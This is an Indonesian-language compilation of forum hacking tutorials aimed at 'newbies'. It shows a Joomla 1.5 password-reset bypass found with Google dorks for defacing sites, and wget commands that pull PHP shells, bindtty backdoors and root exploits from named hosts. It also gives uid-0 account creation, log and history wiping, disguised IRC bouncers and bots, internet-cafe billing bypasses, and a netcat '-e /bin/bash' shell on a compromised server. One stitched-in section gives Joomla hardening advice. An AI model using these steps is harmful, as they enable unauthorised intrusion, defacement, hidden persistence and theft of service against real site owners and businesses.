Cara2 Deface Joomla 1,5 PW reset for Newbie!!

TULISAN INI CUMA BUAT PARA NEWBIE .
BAGI YANG SUDAH MASTER,,HARAP JANGAN DI BACA.
SEBAB,ARTIKEL NI HANYA UNTUK PARA NEWBIE..
TERIMA KASIH..

m . m . m
ceritanya gini,,,waktu itu gua ngeliat di google banyak situs2 malaysia yang di kerjain ama hacker indo.

trus w mikir gini,,"hebat banget ya hacker bisa ngerubah halaman situs2,,,gimana ya cara na....??"

karena w penasaran,,,maka,w pun nyari di google cara2 nge'deface situs,,
akhir na w nemu'in artikel tentang cara ngedeface dengan mudah n' gak perlu pengetahuan khusus.

trus w peraktekin,.,dgn rasa sabar yang tinggi,,akhirnya w berhasil nge'deface situs kecil,,wah waktu itu w seneng banget...
hehehe

m.m.m
mau tau apa yang w lakuin...???

ni w jelasin cara2 nya :

1. sediakan cemilan,air minum,rasa sabar dll.

2. cari target yang bisa di'deface,,cara nya dengan memanfaatkan kakek google,,,

3. ketik di google dengan keyword khusus untuk mencari situs target,,,waktu itu w make dork :

inurl:option=com_user

4. ketik inurl:option=com_user pada search google.lalu tekan enter.

5. Lalu w nyocoba satu-satu situs dari hasil pencarian. Lalu dibelakang alamat situsnya w tambahin ini :

http://situstarget.com/index.php?option=com_user&view=reset&layout=confirm

6. setelah itu maka akan muncul kotak dialog Password Reset.Untuk merubah password nya,w harus masukin kode token dengan benar.

7. ini tampilan confirm kotak dialog Password Reset




pastinya kita gak tau apa kode nya,,,oleh karena itu,kita masukkan code dari mbah dukun.yaitu :


gak keliatan ya,,,emang,cz itu adalah tanda ' atau tanda petik satu. kalo bugnya belum dipatch maka akan muncul form untuk memasukkan password baru. Jika tidak muncul berarti kalian tidak beruntung dan cobalah situs yang lain. Dan ternyata dari sekian puluh hasil pencarian yang w coba ternyata semuanya gagal.

LANJUT KE BAWAH--->>>>

Added (Man In Black)
---------------------------------------------
KITA LANJUTKAN--->>>>

waktu itu w mikir gini,,"kalo dah banyak orang yg nyoba keyword ini,,berarti w ketinggalan ma mereka,Bisa aja tu situs udah pernah dibobol terus langsung dipatch sama Adminnya.."

trus w coba pake keyword yang laen...trus w nyoba pake keyword ini :

inurl:option=com_user inurl:sekolah

kata sekolah itu bisa di ganti dengan kata apa ja yang lo mau cari,kalo bisa diganti ja ma akhiran domain,misal nya .com,.co.cc,dll..

Jadi situs yang muncul adalah situs yang mengandung kata com_user dan kata yang w inginin.
pasti nya yang di tampilin ama kakek google akan beda ama tampilan yg sebelum nya..
dan,w tinggal berharrap kalo2 di antara situs2 itu ada yg bisa di reset PW na pake karakter sakti dari mbah dukun..
maka na perlu kesabaran dlm hal ini.

akhirnya w nemu situs yang bisa di reset PW nya,,,
wkwkwkw

setelah itu,w ganti Password na.
upsz,,jangan seneng dulu,,walau password nya dah di ubah,,tapi kita harus tahu nama username Admin-nya untuk bisa login..Username default dari Joomla adalah admin. Tapi ada juga situs yang mengubah default usernamenya sehingga harus kita tebak-tebak.,,untung nya nebak username lbh muda dari nebak yang laen na...
Coba aja “administrator”, “webadmin”, “adminweb”, dan sekitar-sekitarnya.
nah,,untung nya situs yang mau w bobol belum mengganti username nya...
wkwkwkkwkwkwkw

langkah selanjutnya adalah login menjadi admin,
halaman login joomla adalah :

http://situstarget.com/administrator

trus w memasukkan Username: admin. Password password yang udah di-reset tadi). n' ternyata tembus!
trus,,kalo dah gitu,w bisa ngerubah apapun di situs itu semau w...hehehe

dah,,,selanjut nya terserah lo mw diapain situs itu...
kalo bisa jangan berbuat jahat...tapi ngasih tw admin nya kalo situs nya gak aman...

tutor lengkap pasang backdoor

-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-


=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_...5.com/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGa...public/log.php

==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix...ial/phnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com


PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell

### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029


-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-

### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+

-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir <--- untuk membuat direktory baru
cd <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <--- untuk menghapus file/direktory
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp

wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz

-*------*-

2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

Itu berarti anda telah dapat akses root di IP 213.124.151.113

-*------*-

3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda

masuk ke direktory ftp anda

cd ftp
./awu 213.124.151.113 ( ip nya)

apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
################################################## #################

uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

whoami

root <-- berarti anda sedang dalam akses root

-*------*-

4. Tahap Keempat

Add login akses root anda
----------------------------------------------------------------

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

-*------*-

5. Tahap Kelima

Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

6. Tahap Keenam

Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

SELESAI.....


---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... << lengkapnya >>


---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc Yang aman ~ --*-
-*------------------------------------------*-

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
cd "...." <<-- masuk ke direktori
wget wget http://www.psychoid.lam3rz.de/psyBNC...-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " "

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 11111
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
[scut@d11303 .log]$


ps -x untuk mengetahui proses di background shell
[scut@d11303 .log]$ ps -x
PID TTY STAT TIME COMMAND
31544 ? S 0:16 ./bash
31629 ? S 0:06 sendmail to scut
2212 pts/1 S 0:00 -bash
2291 pts/1 S 0:00 [identd]
2309 pts/1 R 0:00 ps -x
catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik selamat mencoba

-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II --*-
-*------------------------------------------*-
wget http://www.geocities.com/g4ptek/tools/psy.tar.gz
tar -zxvf psy.tar.gz
rm -rf psy.tar.gz
cd .cgi;
./config 21221;-----------> port ubah sesuai keinginan
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:ssstt
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 21221
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
# usage:
# buka mirc, setting identd bebas, nick bebas
ketik /server www.target.com 21221

-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II Freebsd --*-
-*------------------------------------------*-
# wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz
# tar -zxvf bnc.tar.gz
# rm -rf bnc.tar.gz
# cd .ls
# chmod 755 ls
# ./ls
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT I -*-
-*-----------------------------------*-

NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner

contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya)
s4nd4l_j3p1t ...............nick bot
s4nd4l ...................ident bot
212.88.174.3 .......IP shell defaced ..................... nama channel, jangan pake #
g4ptek ................ nick owner

catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :

2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel

-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT II -*-
-*-----------------------------------*-

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.c...ripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth

Selamat BikiN Bot....

rewritten on barata jaya SBY, February 6th 2006 by g4ptek

Teknik Hacking Cyber Billing dan Billing Explorer

Maaf sebelumnya, ane ngebuat posting ini bukan untuk mengajarkan kejahatan tetapi cuma agar pemilik warnet dan OP warnet tahu supaya bisa melakukan pencegahan (walaupun mungkin kurang efektif)

1. Hacking Cyber Billing
a. Mematikan Proses Cyber Billing dengan Hijackthis
Sebenarnya untuk mematikan proses Cyber Billing g harus pake Hijackthis, tapi juga bisa pake software pengganti Task Manager yg lain. Tapi saya memakai hijackthis karna software ini cukup lengkap fiturnya. Oke, sebelum saya menjelaskan langkah-langkahnya, saya mau menjelaskan proses yang dijalankan oleh Cyber Billing, ada dua yaitu CyberClient dan Services, yang mana CyberClient berfungsi untuk menjalankan client Cyber Billing di Komputer tsb, sedangkan Services berfungsi untuk mengecek apakah CyberClient masih berjalan atau tidak. Apabila Services menemukan CyberClient tidak aktif, maka Services akan otomatis merestart komputer.
Jadi, untuk mematikan proses CyberClient, kita harus mematikan Servicesnya dahulu, yaitu dengan memakai Hijackthis, jalankan Hijackthis, klik Do a Scan Only, klik Config, pada bagian Configuration pilih Misc Tools, klik Run, Ketik Services.msc, selanjutnya pada Services.msc klik kanan CyberBilling Protection pilih stop.

[IMG]http://api.ning.com/files/ImVd3gydM6-b1qtuv4B0wDi9g-ARhHpbEW8C8CfaI9*8z3kvDRk7qS8CQ1BTCWZ0dv4XE4HApfsm VERQwkoUi1KMR2G1OWud/me1.jpg[/IMG]

Selanjutnya close services.msc pada Misc Tool Hijackthis pilih proses CyberClient.exe klik Kill Process, maka proses Cyber Billing akan berhenti dan ente bias main sepuasnya.

b. Speed Hack Cyber Billing
Klo bahasan yang diatas sepertinya terlalu kasar, maka pada bagian yg kedua ini kita tidak akan mematikan proses billingnya, tapi Cuma membuat proses Billing itu berjalan lambat. Untuk bisa mewujudkan itu, kita bisa menggunakan Cheat Engine (Software untuk menciptakan Cheat pada Game), silahkan jalankan cheat enginenya, selanjutnya klik icon bergambar komputer, dan pada bagian process list, pilih proses CyberClient.exe, klik OK.


Selanjutnya Check pada Enable Speedhack dan isikan nilainya Pada Speed (standar nilainya 1.0), jadi klo kita mau memperlambat proses penghitungan waktunya nilainya bisa kita ubah menjadi lebih kecil dari 1.0 (misalkan 0.5).dan, wakaka, selamat anda sudah bisa bermain 2 jam dengan hanya membayar 1 jam.

2. Hacking Billing Explorer
Untuk bisa bermain internet gratis di Billing Explorer, yang saya tau ada dua cara, cara yang pertama, pada saat menghidupkan komputer dan proses billing belum berjalan tekan Ctrl + Alt + Del, selanjutnya kill proses client008 (Cuma bisa untuk komputer yang loadingnya agak lambat), selanjutnya cara kedua, cabut kabel jaringan di kompuer anda, restart komputer, tunggu billingnya aktif, pilih Admin, selanjutnya masukkan password default Billing Explorer (passwordnya 008), pilih exit client and password, setelah keluar dari program billing, maka anda dapat memasang kembali kabel jaringan di komputer yang anda pakai.

link donlot :
- Cheat Engine 5.4
- Hijackthis Portable

Ilmu adalah ibarat pisau bermata dua, jadi jangan sampai disalahgunkan apa yang anda ketahui

Hacking Joomla!! dan penangananya

Beberapa waktu yang lalu ada keluhan dari seorang teman, yang menyatakan bahwa situsnya terkena serangan. Sang teman menggunakan CMS Joomla! sebagai engine web yang dimilikinya. Saya cek di TKP ternyata benar, halaman utama dan administratornya telah berganti wajah (defaced). Pertanyaanya adalah mengapa hal ini terjadi?

Sebenarnya saya cukup dibuat gusar oleh sang teman. Alasanya karena dia mencurigai saya terus-menerus sebagai dalang perusak situsnya. Loh kok?..saya juga bingung dengan hal tersebut. Saya beranggapan dia mencurigai saya karena mencoba bersaing secara tidak sehat. Aneh juga sih… ntahlah, mungkin dia menggunakan Blog saya sebagai alibi. Toh blog saya lahir semenjak 3 tahun yang lalu sebagai media sharing pengalaman saja. Jadi kalau dia mengganggap Blogger = Cracker, mungkin ada benarnya juga. Masih untung ada Cracker yang mau berbagi ilmu dengan menjadi Blogger. Satu lagi, jangan singgung masalah mental Blogger dong. Risih saya mendengarnya. Tidak ada aturan khusus di negara ini mengenai konten blog apa yang boleh atau tidak. Asalkan konten tidak berbau pornografi dan SARA semua boleh-boleh saja. Saya juga bukan tipe perusak seperti yang dianggap. Walaupun untuk memposting sebuah artikel saya harus melakukan percobaan terlebih dahulu. Sekali lagi Blogger tetap Blogger, Cracker tetap Cracker atau bisa keduanya Cracker merangkap sebagai Blogger.

Okey kembali ke pengakuan. Meskipun saya sedikit tahu teknik defaced web dengan SQL Injection atau XSS (cross site scripting). Sumpah..Bukan saya pelakunya!. Di luar sana bergentayangan dedemit maya ratusan jumlahnya dengan trisula di tanganya . Kalau anda seorang admin web, tentunya anda dapat melacak jejak sang pembongkar dari LOG yang disediakan oleh server. Cara mudahnya anda juga bisa MERESTORE ke tanggal yang lebih lama, dan langsung bisa sehat. Ngapain harus upload ulang dengan domain dan web hosting baru. Suatu tindakan membuang duit saja menurut saya. Kecuali kalo server yang anda gunakan tidak menyediakan fasilitas BACKUP harian. Kalau begitu salahkan admin servernya dong.
Mengapa di HACK?

Bukan itu pertanyaan yang tepat. Kalau itu yang anda tanyakan, jawabanya akan sangat panjang. Pertanyaan yang tepat adalah, “Bagaimana bisa diHack?…Okey saya jelaskan sebatas kemanpuan saya.
Anda tahu dengan CRAWLER? itu adalah hewan peliharaan tuan GOOGLE. Dia adalah Laba-laba mesin raksasa yang tugasnya menjaring informasi website yang ada di dunia. Kehebatanya jangan diragukan. Kalau anda meragukan berarti anda juga meragukan Google sebagai mesin pencari no.1 di dunia. Spidernya Google ini dapat menangkap informasi sebuah website paling lama 7 hari kerja.
Lantas apa hubunganya? Sama seperti jarak matahari dengan bumi yang 10 menit. Website anda akan terdeteksi dengan baik oleh Link Scanner setelah 7 hari diaktifkan. Istilahnya Google Hacking. Silakan cara referensi Google Hacking di Internet. Intinya para hacker memanfaatkan Google sebagai Link Scanner situs- situs mana yang memiliki celah. Hanya dalam 7 hari. (seperti iklan produk kecantikan aja, he..he). Jadi jangan salahkan saya hanya karena saya yang tahu informasi website anda sebelumnya. Website anda sudah tayang 7 hari bukan?. Feuh….payah.

Kembali ke permasalahan. Joomla! merupakan CMS populer yang paling banyak digunakan oleh pengguna website, termasuk saya. Keunggulan Joomla tidak perlu dijelaskan lagi. Silakan datang ke toko buku di kota anda dan pilih sendiri puluhan judul buku yang membahas Joomla!.

Karena Joomla! banyak digunakan, jadi sudah pasti CMS ini jadi sasaran bulan- bulanan oleh para cracker. Berikut ini beberapa tips pengalaman saya menggunakan Joomla! dan teknik mengamankanya:

1. Update Continues
Sama seperti anti virus di komputer, Joomla! juga memerlukan update secara rutin. Terlambat sedikit saja tidak mengundape Core Joomla!, silakan tunggu saja serangan ke website anda.
Kapan kita melakukan Update?
Tidak seperti anti virus yang dapat langsung melakukan update jika kondisi dalam keadaan kritis. Joomla! harus diupdate secara manual.
Kapan waktu yang tepat?
Yang jelas ketika ada informasi celah keamanan pada versi Joomla! yang kita gunakan. Untuk lebih mudahnya anda bisa berlangganan RSS Feed melalui e-mail issue keamanan Joomla! di Joomla! Security Announcements. Jika terdapat celah keamanan pada sistem joomla!, maka akan ada informasi yang dikirimkan melalui e- mail untuk segera melakukan patching.
Beberapa orang mungkin masih bingung cara menginstal Joomla! Patch Package. Caranya adalah dengan menggunakan FTP Client misalnya FileZilla. Silakan cari di Google softwarenya dan caranya. Atau kirim e-mail ke saya, nanti saya jelaskan melalui chat.

2. No Hole
artinya?… tau ah, istilah saya aja itu. Jika anda pengguna web hosting pemula biasanya masih bingung dengan istilah ini. Pada direktori web hosting ada istilah folder access bukan? nah itu dia..Jadi pastikan direktory access pada posisi 775 atau 777 pada setiap folder. Kalau masih bingung tanyakan aja deh ke admin supportnya web hosting atau baca di manualnya deh.
….(saya menulis artikel ini sedang tidak didepan server dan dalam kondisi buru- buru, makanya tidak bisa detail, maaf ya)

3. Gunakan plugin jSecure
Plugin yang satu ini saya akui kehebatanya. Dengan plugin ini anda bisa mengganti URL halaman administrator default ke URL khusus. Tahukan, halaman administrator joomla dapat diakses di http://sitename.com/administrator. Plugin jSecure akan memindahkan alamat admin tersebut ke dalam bentuk http://sitename.com/administrator/?keyname. Keyname dapat anda buat sendiri sesuka hati.
Jadi dengan plugin ini anda bisa melindungi halaman login administrator. Lebih aman bukan?
4. Hati-hati menginstal Componen, Module dan Plugin
Serangan Joomla tidak hanya dilakukan melalui Core Joomla!. Sebagian besar justru melalui komponen, module, plugin atau templatenya. Jadi pastikan sebelum memilih module, komponen dan plugin, pastikan sumber websitenya jelas dan memiliki rating pengguna yang banyak serta tidak banyak keluhan.
Mudahnya, cari langsung dari sumbernya di Joomla! Ekstention. Kemudian baca reviewnya dan pastikan kondisinya aman.

5. Template premium tapi warez
Kehebatan Joomla! salah satunya adalah adanya beragam template menarik yang siap diunduh dimana saja. Template menarik pastinya yang premium. Namun anda harus menebusnya dengan cara membeli. Atau cara klasik lama dengan mencarinya di situs warez atau filesharing. Disana terdapat ratusan template premium siap unduh dan siap pakai.
Pertanyaanya apakan aman digunakan?
Saya jawab aman jika anda tahu menggunakannya. Namun sangat tidak aman jika langsung memakainya mentah- mantah.
Mengapa?
Template premium biasanya langsung berisi core, komponen, module dan plugin siap pakai dalam paket template yang disertakan. Enak sih, karena langsung jadi tinggal ganti artikel saja. Sayangnya hampir seluruh komponen yang disertakan dalam versi jadul. Kalau versi jadul digunakan sudah pasti mudah diserang toh?… anak kecil aja tahu jawabanya.
Jadi kalau anda menggunakan template premium abal-abal, pastikan juga anda menpacth core, komponen, module dan plugin yang disertakan di dalamnya. Cukup repot bahkan kemungkinan crashnya tinggi. Namun gimana lagi. Daripada setelah dipasang seminggu langsung diserang! iya ngga?
6. Ngumpul di Komunitas Joomla
Anda tak akan pintar tanpa bantuan orang lain. Oleh karena itu, untuk mempercepat wawasan anda tentang Joomla! silakan gabung di komunitas Joomla!. Cek di Joomla! ID

Maju terus teknologi informasi Indonesia

thanks to idechapunk

[Tutor] Root For Newbie !!

Hmmmm, capek udah setiap oL di YM 2 atau 3 account list friend pm gw cuma untuk menanyakan bagaimana cara bisa "Take Over Root Server" and blablabla. Ok deh sekarang sesuai janji gue buatin tutor'a.Dan sebelum'a gue mau ngucapin thx dolo buat v3n0m,aRiee,leQhi,lingah,GheMaX,m4rco,JaLi-,r1pp3r_m4y4,Ijoo and all crew Yogyacarderlink BlackHat team.

Syarat'a :
-Dilarang copas tutor ini ke forum lain (kalau mau belajar silahkan pelajarin sendiri disini)
-Dilarang copas ke blog pribadi kalian tanpa izin.
-Dilarang comment yang gak penting :-P
-Gak usah dipelajarin tutor ini kalau buat orang yang gak mau berusaha belajar sendiri.
-Yang ngeliat gak comment gue sumpahin GAY !!

Kalau syarat sudah di penuhin semua sekarang bahan2 yang perlu lo siapin sebelum bertempur (ciye ileh lebay deh)
*.Sebungkus rokok Djarum Super.
*.Kopi mocca capuchino.
*.Sedikit cemilan.
*.Music mp3 yang selalu mengalun.
*.Dan yang jelasnya PC/LAPTOP yang tersambung ke Internet.
*.Siapin target yang sudah di tanem BackDoor dan usahakan cari target yang update'a di bawah bulan Agustus atau di bawah Tahun 2009 biar lo gak susah belajarnya.
*Sebelum genderang perang di tabuh(buseeeeeeeeeeeet) kalau lo pake mikocok windon download dolo netcat/nc untuk di PC lo download disini netcat yang buat mikocok windon, masuk ke drive C: trus buat folder kasih nama nc dan lo extrack netcat yang lo donlod tadi disana (kalau lo yang pake linux gak perlu lagi download ini)
*.Peralatan tempur terakhir http://diperta.jabarprov.go.id/images/galeri/nc (netcat/nc) buat lo pasang dibackdoor

=== STEP 1 ===
Okey coy kalau semuanya udah siap silahkan ping target lo yang mau di local tadi.
Kalau udah copy IP'a buka terminal/console/cmd yang di PC lo (ya eyalah jelas di pc lo masa mau di pc tetangga >,<)
Kalau udah di buka masuk ke folder nc/netcat yang lo donlod buat di pc lo tadi kalau udah langsung aja lo ketik seperti ini
nc -vv "IP TARGET" "PORT" (INGET TANPA TANDA KUTIP DAN PORT YANG LO MASUKIN TERSERAH YANG PENTING 4 DIGIT)
example : nc -vv 324.443.124 6969

=== STEP 2 ===
Kalau sudah buka target lo yang udah lo tanem Backdoor tadi.
Dan lo upload nc yang buat lo pasang di backdoor tadi.
ketik :
wget http://diperta.jabarprov.go.id/images/galeri/nc; ls -la
or
lwp-download http://modelbarn.co.nz/nc; ls -la

kalau udah lo ubah permission'a ketik
chmod 755 nc; ls -la
Dan lo liat kalau udah berubah seperti ini 1441799 -rwxr-xr-x 1 southernpaua southernpaua 17488 Jan 25 00:55 nc berarti permission'a udah lo ubah.


=== STEP 3 ===
Cara connect Back antara target ke PC lo.
Ketik :
./nc -vv -l -p "port" -e /bin/bash
Di Backdoor yang mau lo local (isi port harus sama yang lo ketik di console/terminal/cmd lo tadi tanpa tanda kutip ")
Dan kalau sudah tekan enter yang di backdoor lo setelah itu tekan enter lagi yang di console lo secara bersamaan.
Priview :

